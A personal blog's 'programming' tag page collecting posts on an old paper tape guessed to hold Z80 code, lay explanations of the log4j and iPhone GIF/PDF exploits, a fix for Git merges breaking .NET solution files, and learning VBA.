+++*

Symbolic Forest

A homage to loading screens.

Blog : Posts tagged with ‘programming’

The Paper Archives (part two)

More relics from the past

The previous post in this series is here.

Spending some more time going through the things The Parents should arguably have thrown out decades ago, I came across a leather bag, which seemed to have belonged to my father. Specifically, he seemed to have used it for going to college, in the 1970s. Him being him, he’d never properly cleaned it out, so it had accumulated all manner of things from all across the decade. There were “please explain your non-attendance” slips from 1972; an unread railway society magazine from 1977; and the most recent thing with a date on was an Open University exam paper from 1983. It was about relational database design, and to be honest some of the questions wouldn’t be out of place in a modern exam paper if you asked for the answers in SQL DDL rather than in CODASYL DDL, so I might come back to that and give it its own post. What he scored on the exam, I don’t know. There were coloured pencils, and an unopened packet of gum.

Juicy Fruit gum

It seems to be from before the invention of the Best Before date, but the RRP printed on the side is £0.04.

Slightly more expensive: a rather nice slide rule. Look, it has a Standard Deviation scale and all. Naturally, my dad being my dad, it was still in its case and with the original instruction book, which will be useful if I ever try to work out how to use it.

Slide rule

And finally (for today) I spotted what appeared to be a slip of paper at the bottom of the bag with “NEWTON’S METHOD” written on it in small capitals, in fountain-pen ink. Had he been cheating in his exams? Had he written a crib to the Newton-Raphson method down and slipped it into the bottom of the bag? I pulled it out and…I was wrong.

Paper tape

It was a rolled-up 8-bit paper tape! Presumably with his attempt at a program to numerically solve a particular class of equation using Newton’s method.

I don’t know what type of machine it would have been written for, but I could see that it was likely binary data or text in some unfamiliar encoding, as whichever way around you look at it a good proportion of the high bits would be set so it was unlikely to be ASCII. Assuming I’m holding the tape the right way round, this is a transcription of the first thirty-two bytes…

0A 8D 44 4E C5 A0 35 B8 0A 8D 22 30 A0 59 42 A0 47 4E C9 44 C9 56 C9 44 22 A0 D4 4E C9 D2 50 A0

That’s clearly not ASCII. In fact, I think I know what it might: an 8080/Z80 binary. I recognise those repeated C9 bytes: that’s the opcode for the ret instruction, which has survived all the way through to the modern-day x64 instruction set. If I try to hand-disassemble those few bytes assuming it’s Z80 code we get:

ld a,(bc)
adc a,l
ld b,h
ld c,(hl)
push bc
and b
dec (hl)
cp b
ld a,(bc)
adc a,l

This isn’t the place to go into Z80 assembler syntax—that might be a topic for the future—other than to say that it reads left-to-right and brackets are a pointer dereference, so ld c,(hl) means “put the value in register c into the memory location whose address is in register hl. As valid code it doesn’t look too promising to my eyes—I didn’t even realise dec (hl) was something you could do—but I’ve never been any sort of assembly language expert. The “code” clearly does start off making assumptions about the state of the registers, but on some operating systems that would make sense. This disassembly only takes us as far as the repeated 0A8D, though: maybe that’s some sort of marker separating segments of the file, and the actual code is yet to come. The disassembly continues…

ld (&a030),hl
ld e,c
ld b,d
and b
ld b,a
ld c,(hl)
ret
ld b,h
ret
ld d,(hl)
ret
ld b,h
ld (&a0d4),hl
ld c,(hl)
ret
jp nc,(&a050)

Well, that sort of makes some sort of sense. The instructions that reference fixed addresses all appear to point to a consistent place in the address space. It also implies code and data is in the same address space, in the block starting around &a000 which means you’d expect that some of the binary wouldn’t make sense when decompiled. If this was some other arbitrary data, I’d expect references like that to be scattered around at random locations. As the label says this is an implementation of Newton’s method, we can probably assume that this is a college program that includes an implementation of some mathematical function, an implementation of its first derivative, and the Newton’s method code that calls the first two repeatedly to find a solution for the first. I wouldn’t expect it to be so sophisticated as to be able to operate on any arbitrary function, or to work out the derivative function itself.

If I could find jumps or calls pointing to the instructions after those ret opcodes, I’d be happier. Maybe, if I ever have too much time on my hands, I’ll try to decompile the whole thing.

The next post in this series is here

Teaching an image to think

Computers work in unexpected ways

Following on from yesterday’s post about log4j: another security article fascinated me in the last week, too. You might have already seen it, because it was widely shared on Twitter and computer people everywhere were amazed and aghast at its engineering and its possibilities. The log4j vulnerability is a relatively pedestrian one by comparison, using something that is an entirely documented and public feature of the library. This, on the other hand, is a completely different animal.

It’s a hack which lets you run code on a stranger’s iPhone just by sending them a message. They don’t have to click on anything, they don’t even have to open it, all their phone has to do is receive it and the hacker can take their phone over. At least, could: the fix for this security hole was fixed three months ago in iOS 14.8 and later. If you are running an older version of iOS on your phone or tablet, then, er, maybe don’t. The analysis of how this hack works, by Google Project Zero, has started to be published; and if you’re a programming nerd, it is beautiful and amazing and horrific in just the same way that a biological virus is.

In short, this hack relied on the fact that an iOS device, when it receives an animated GIF, tries to hack the GIF a little so it will always loop forever whatever the GIF itself actually says to do. It does this in an unhealthy way, though. When it opens the file to change it, it doesn’t matter if it’s not actually a GIF. The software will try to be clever and say “ah, looks like your file’s got the wrong name there, don’t worry, I still know how to open one of these” and do it. Even if it’s not a GIF and therefore doesn’t really need to.

Secondly, the hack relies on a bug in an open source PDF-reading library, in the part of the code used to open embedded images that are in an obscure and rather out-of-date format mostly used by fax machines. PDF is a big, complex and rambly format (believe me I know, I’ve been on-off trying to write a .NET PDF writing library for some years now) so it’s not surprising there are bugs and holes in PDF-reading software. What this hack does, though, is frankly brilliant. It uses the capabilities of the compression algorithm of this particular graphics format to implement an entire virtual CPU in the memory of the target device. It’s a small CPU but it is a Turing-complete one, which in technical terms mean that if you ignore practical limits of time and memory, it’s just as powerful as any other computer. An entire virtual CPU…created by feeding a carefully-designed image into a buggy image decompression routine.*

Frankly, if you’re a software developer, this is genius. Evil genius, to be sure, but genius nonetheless. I’m somewhat in awe of it, in a dirty way. It’s a wonderful level of lateral thinking, to know that the bug is there to exploit and work out a way to reach it and trip it up to begin with; and then to build an entire virtual machine from the basic Boolean logic operations available inside a particular image format. As I said above, it’s beautiful, it’s amazing, and it’s horrific in the original sense of the word. It’s awe-inspiring. I might be good at my job, but I can only look upon this with amazement and envy.

* I assume the image itself looks like just so much white noise if you could actually view it, but you can’t have everything. It reminds me a little of Neal Stephenson’s early-90s novel Snow Crash, in which a carefully-designed image that looks like white noise can hack the viewer’s brain.

Some logical relief

In which we discuss a topical flaw

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. Virtually all Java server-side code out there uses log4j somewhere inside it, to handle this sort of thing.

Unfortunately, log4j has a few handy features that were originally intended to be useful features, but aren’t necessarily a good idea to have running on an internet-facing server that does important work such as process your banking requests. Particularly, in this case, if you put a certain specialist type of URL into a log record, log4j will see it, try to download another program from it, and will then run that program in a certain well-defined way. Of course, you might say, there’s nothing wrong with that because all of the log record messages are just written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want to. Including a special type of URL which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.

The fix for this is straightforward, but rolling the fix out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed when it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of her career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.

Technical advice post of the week

Or, what to do with a particular compilation problem

This week, Microsoft released .NET 5, and it reminded me I’ve been meaning to post a piece of technical advice that has bitten me a few times but which doesn’t seem to be very well-documented or well-described online. It’s a piece of technical advice, though, that will slowly be fading away in relevance because it’s advice on .NET Framework; so I thought I should put it up here whilst it is still helpful to people.

(Note for non-technical readers, who are used to photos of trains and cemeteries and probably won’t find this post very interesting: .NET 5 is the latest version of .NET Core, which is the replacement for .NET Framework, hence Microsoft have dropped “Core” from the name to try to make that clearer. .NET 5 is the successor to .NET Core 3, because there were many very popular versions of .NET Framework 4.x which were and are heavily used for a long time, so Microsoft thought reusing the number 4 would be just Too Confusing. Are you less confused now?)

This problem, too, is pretty much specific to people working in teams. It only happens (well, I’ve only seen it happen) if all of the following apply:

  • you’re working in parallel in a team, on a complex system, probably that has solutions containing a relatively large number of projects
  • you’re using the MSBuild tool as part of your continuous integration pipeline, deployment process, or similar
  • you’re using Git as your version control system

The symptoms of the problem are:

  • You can open the solution in Visual Studio and build it with no problems
  • When MSBuild tries to build the solution, it immediately errors, claiming that the solution file has a syntax error on line 2.

Spoiler: there is no syntax error on line 2.

Another note for non-technical readers who are still here: what you might think of loosely as a programming project, in any kind of .NET flavour, has a primary file called a “solution” (its name ends in .sln). The solution contains one or more “projects”; each project contains code. Visual Studio can open your solution file and your project files and turn the projects into some sort of output product, such as a program, a website, a code library or whatever. However, you don’t have to use Visual Studio to do this. .NET Framework has a program called MSBuild that does the same thing. If you have automated your build process (which if you’re working in a team you probably should) and you’re using .NET Framework, your build process will probably use MSBuild to do its work. What happens here is one of a range of problems called “well it worked on my machine”. A developer has code that seems to be in a happy, working state, they upload their code to the team’s server, the automated build process runs, and the automated build process falls over and says it doesn’t work.

The cause of the problem is: two people on the team have added different projects to the solution, in parallel. Now, Git is often quite good, when two people change code at the same time, at either working out how to merge the changes together, or at least, asking you to sort the situation out manually. This, though, is a situation where Git does the wrong thing and breaks your solution file—but it breaks it in a way that only MSBuild notices, and that Visual Studio happily ignores.

The reason this happens is down to the syntax of solution files. The part which lists the projects they contain looks a bit like this:

Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Important.Project.Library", "Important.Project.Library\Important.Project.Library.csproj", "{E6FF8E04-A41D-446B-9F8A-CCFAF4B08AD2}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Important.Project", "Important.Project\Important.Project.csproj", "{9A7E2940-50B8-4F3A-A535-AB6220E6CE3A}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Important.Project.Tests", "Important.Project.Tests\Important.Project.Tests.csproj", "{68035DDB-1C24-407C-B6B3-32CEC1D964E5}"
EndProject

Don’t worry too much about what each line says: the important thing to spot is that each project has a pair of lines: a Project(...) = line that contains the important information, and an EndProject line that, er, doesn’t. The projects are in a fairly arbitrary order, too; on your screen in Visual Studio they get sorted alphabetically, but that isn’t reflected in the file, where they are in the order they were added in.

The real cause of the problem is that Git doesn’t know that every Project... has to be followed by an EndProject. So, imagine two people have added new, different projects to the solution file. Git sees this and thinks: Alice has added Project... to line 42, and Bob has added a different Project... to line 42. So I’ll make those into lines 42 and 43. Alice added EndProject to line 43, and so did Bob, so I’ll just pop that in as line 44. So you get this:

Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Alices.Library", "Alices.Library\Alices.Library.csproj", "{0902233A-3857-4E5E-99F4-54F3F5E695E5}"
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bobs.Library", "Bobs.Library\Bobs.Library.csproj", "{56ABE9BB-1373-43D3-B1C5-1526E443AD73}"
EndProject

Visual Studio is quite unpeturbed by this. MSBuild, however, doesn’t like it at all. It reads the file, realises there’s a Project without a matching EndProject, and falls over. For some reason, it always complains that the error is on line 2, even though it isn’t anywhere near line 2.

The fix for this, as you might have guessed, is to open up the solution file in a text editor and manually enter that missing EndProject line after Alice’s project. And that’s it. Or, if you don’t feel comfortable going in and hacking your solution file directly, remember I said that Visual Studio is completely unfazed by this? You can make some sort of small change in Visual Studio that will imply a different change to the solution file: for example, tell it not to build one of the projects in one of the build configurations. Visual Studio doesn’t just change that bit, it will write out the whole file from scratch, so the problem gets silently fixed for you. Which one is less work depends on which one you’re happier doing, to be honest.

That’s the abstruse technical post over for now. Next time I write one, I’ll see if I can find something even more technically obscure.

Masochism

In which we go back to BASICs

No, I’m not a masochist.

I take a strange, geeky, masochistic pleasure, though, in making things hard for myself. In doing computer-based things the long way round. In solving the problems that are probably easy for some people, but hard for me. In learning new things just because it’s a new challenge.

Today, I was wrestling with a piece of Basic code in an Excel spreadsheet. I’ve not touched Basic since it had line numbers, which is a long long time ago, and I barely know any of it. I forced myself to work out, though, how to do what I wanted.* It was mentally hard work, and meant a lot of looking back and forth to the help pages, but I got it done in the end. It might not be written in the best way, the most efficient way, or the most idiomatic way.** But doing it was, strangely, fun.

* or, rather, what the consultant I was assisting wanted.

** for non-geeks: every computer language or system has its own programming idioms, which fit certain ways of programming particular problems. Someone used to language A will, on switching to language Z, often keep on programming in language A’s style even if this produces ugly and inefficient code in the other language.